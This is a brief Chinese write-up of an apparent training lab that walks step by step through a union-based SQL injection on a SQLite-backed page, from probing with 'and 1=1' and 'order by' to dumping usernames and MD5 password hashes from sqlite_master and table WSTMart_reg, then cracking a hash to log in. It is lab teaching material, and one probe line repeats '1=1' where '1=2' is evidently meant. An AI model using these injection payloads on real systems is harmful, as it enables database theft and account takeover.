题目介绍:

题目.PNG

判断注入:

使用语句:?id=1 and 1=1 # 页面回显正常
判断1.PNG

使用语句:?id=1 and 1=1 #页面回显报错,存在整型注入
判断2.PNG

判断数据库列数:

当使用到语句:?id=1 order by 5 #时页面报错不回显,所以列数为4
字段数为5.PNG

判断回显位置:

使用语句:?id=-1 union select 1,2,3,4 # 可知回显位置为2和3
回显位置.PNG

获取数据库名字:

使用语句:?id=1 union select 1,name,3,4 from sqlite_master where type='table' limit 1 offset 0
数据库.PNG

爆数据库表的字段:

使用语句:?id=1 union select 1,sql,3,4 from sqlite_master where type='table' and name='WSTMart_reg' #
表.PNG

爆破字段值:

使用语句:?id=1 union select 1,name,password,4 from WSTMart_reg limit 1 offset 0 #
字段值1.PNG

MD5解码:

解码获得密码
MD5.PNG

获取key:

用户名:mozhe 和 密码:625142 登录获得key
key.PNG